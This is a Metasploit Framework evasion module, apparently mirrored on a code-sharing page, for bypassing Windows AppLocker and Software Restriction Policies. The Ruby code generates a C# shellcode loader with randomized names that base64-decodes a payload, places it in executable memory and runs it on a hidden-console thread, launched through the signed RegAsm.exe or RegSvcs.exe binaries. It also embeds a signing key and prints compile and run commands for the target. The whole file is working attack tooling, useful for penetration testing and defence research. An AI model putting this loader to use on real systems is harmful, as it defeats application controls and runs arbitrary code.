Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_regasm_regsvcs.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Applocker Evasion - Microsoft .NET Assembly Registration Utility',

13
        'Description' => %q{

14
          This module will assist you in evading Microsoft

15
          Windows Applocker and Software Restriction Policies.

16
          This technique utilises the Microsoft signed binaries

17
          RegAsm.exe or RegSvcs.exe to execute user supplied code.

18
        },

19
        'Author' => [

20
          'Nick Tyrer <@NickTyrer>', # module development

21
          'Casey Smith' # regasm_regsvcs bypass research

22
        ],

23
        'License' => MSF_LICENSE,

24
        'Platform' => 'win',

25
        'Arch' => [ARCH_X86, ARCH_X64],

26
        'Targets' => [['Microsoft Windows', {}]],

27
        'References' => [['URL', 'https://attack.mitre.org/techniques/T1121/']]

28
      )

29
    )

30


31
    register_options(

32
      [

33
        OptString.new('TXT_FILE', [true, 'Filename for the evasive file (default: regasm_regsvcs.txt)', 'regasm_regsvcs.txt']),

34
        OptString.new('SNK_FILE', [true, 'Filename for the .snk file (default: key.snk)', 'key.snk'])

35
      ]

36
    )

37


38
    deregister_options('FILENAME')

39
  end

40


41
  def build_payload

42
    Rex::Text.encode_base64(payload.encoded)

43
  end

44


45
  def obfu

46
    Rex::Text.rand_text_alpha 8

47
  end

48


49
  def regasm_regsvcs

50
    esc = build_payload

51
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

52
    <<~HEREDOC

53
      using System;

54
      using System.EnterpriseServices;

55
      using System.Runtime.InteropServices;

56
      namespace #{mod[0]}

57
      {

58
      public class #{mod[1]} : ServicedComponent

59
      {

60
      [ComRegisterFunction]

61
      public static void RegisterClass(string #{mod[2]})

62
      {

63
      #{mod[3]}.#{mod[14]}();

64
      }

65
      [ComUnregisterFunction]

66
      public static void UnRegisterClass(string #{mod[2]})

67
      {

68
      #{mod[3]}.#{mod[14]}();

69
      }

70
      }

71
      public class #{mod[3]}

72
      {

73
      private static Int32 #{mod[4]}=0x1000;

74
      private static IntPtr #{mod[5]}=(IntPtr)0x40;

75
      private static UInt32 #{mod[6]} = 0xFFFFFFFF;

76
      [System.Runtime.InteropServices.DllImport("kernel32")]

77
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

78
      [System.Runtime.InteropServices.DllImport("kernel32")]

79
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

80
      [System.Runtime.InteropServices.DllImport("kernel32")]

81
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

82
      [System.Runtime.InteropServices.DllImport("user32.dll")]

83
      static extern bool ShowWindow(IntPtr #{mod[7]}, int nCmdShow);

84
      [System.Runtime.InteropServices.DllImport("Kernel32")]

85
      private static extern IntPtr GetConsoleWindow();

86
      const int #{mod[8]} = 0;

87
      public static void #{mod[14]}()

88
      {

89
      IntPtr #{mod[7]};

90
      #{mod[7]} = GetConsoleWindow();

91
      ShowWindow(#{mod[7]}, #{mod[8]});

92
      string #{mod[9]} = "#{esc}";

93
      byte[] #{mod[10]} = Convert.FromBase64String(#{mod[9]});

94
      byte[] #{mod[11]} = #{mod[10]};

95
      IntPtr #{mod[12]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[11]}.Length, #{mod[4]}, #{mod[5]});

96
      System.Runtime.InteropServices.Marshal.Copy(#{mod[11]}, 0, #{mod[12]}, #{mod[11]}.Length);

97
      IntPtr #{mod[13]} = IntPtr.Zero;

98
      WaitForSingleObject(CreateThread(#{mod[13]}, UIntPtr.Zero, #{mod[12]}, #{mod[13]}, 0, ref #{mod[13]}), #{mod[6]});

99
      }

100
      }

101
      }

102
    HEREDOC

103
  end

104


105
  def snk

106
    debaser = 'BwIAAAAkAABSU0EyAAQAAAEAAQD9yIxqf9oJgwLw6nUHqVNq4LaP+/eaL4qTT9K9aV/z7ddCP8+Uf2/47KnHklpaw+eH03ZaA2yKYBA9s+Al0VoyajA76HQp

107
    HDaCgiURBIT2GBLUGwdhoEMWX5J8eoCzkucJEjSsavQh+r9JeB6zcQvoZIx0PrpELgQc8is8j2jvsFuc5LQ8ZFoPk1273TTxKibw84HFESjxJrRtkSjwoEo4OUuZtL3C7fD

108
    gnaSoeLnMwohmyTTjt15zgBZv7xD5u/CHD4/+tySJufY5j0FkBxhyqt2DWHcmH4MQCC6PgYfIuTXEAD35o0cg+6s6pJYKB+DUCrU5vSime3jyWno9vCe87UT+fQcDrKntHB

109
    mjnj9WliAMZlU1IuCWieT7fzGZqqIsd4rrcgxetnWzaWRAkgHcTVkmVPIt0z9zHU71s7CER2viklJkiaZjRQan5ZA7bTqqsuG1xoIyXTWbKsaAMCKf5a4IJS2ImpqaYA9HR

110
    BrIV7be2o0QJxSm1LPqBXJqkAhnCpcYyfve2dql7fF+fAIDGe3ZgCEbJsfYuAaAY0snGJQhUgLmwO8GDbsbMUTuBQspDv8QXsF53UNH5v5dnOKaTfo71LrI+I5zBUqEYP3B

111
    DtK0qryu/J1eq80nPAmpNqRbFnYm1OdGKpgzHS+Ws7obPSt1HG3//BxC3a5znX0evfCfSaaWRswhjvblnh1070b3jkT6nJeksKuuVEHvudAQAtGn2vxNDs4CqrJODi5Z/BA

112
    KgpIZqQeZmh3r4Zb5OI0='

113
    Rex::Text.decode_base64(debaser)

114
  end

115


116
  def file_format_filename(name = '')

117
    name.empty? ? @fname : @fname = name

118
  end

119


120
  def create_files

121
    f1 = datastore['TXT_FILE'].empty? ? 'regasm_regsvcs.txt' : datastore['TXT_FILE']

122
    f1 << '.txt' unless f1.downcase.end_with?('.txt')

123
    f2 = datastore['SNK_FILE'].empty? ? 'key.snk' : datastore['SNK_FILE']

124
    f2 << '.snk' unless f2.downcase.end_with?('.snk')

125
    txt_file = regasm_regsvcs

126
    snk_file = snk

127
    file_format_filename(f1)

128
    file_create(txt_file)

129
    file_format_filename(f2)

130
    file_create(snk_file)

131
  end

132


133
  def instructions

134
    print_status "Copy #{datastore['TXT_FILE']} and #{datastore['SNK_FILE']} to the target"

135
    if payload.arch.first == ARCH_X86

136
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"

137
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

138
      print_status 'or'

139
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

140
    else

141
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"

142
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

143
      print_status 'or'

144
      print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"

145
    end

146
  end

147


148
  def run

149
    create_files

150
    instructions

151
  end

152
end

153


154